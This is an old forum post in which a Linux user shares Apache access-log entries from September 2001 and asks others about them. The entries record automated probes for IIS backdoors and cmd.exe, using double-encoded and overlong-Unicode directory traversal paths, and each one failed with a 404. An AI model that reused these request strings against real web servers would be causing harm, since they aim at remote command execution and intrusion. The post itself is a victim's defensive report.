Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these,
209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the log of the past 3 months, there are about 200 tries of this kind from various ranges of IP address.
I think this is apparently virus attack. Has anybody here ever found such log? I just dial-up to the Internet and the connection lasted for about 30 minutes and I got this attack. I would keep my httpd closed. Thank god, my system is Linux, not NT.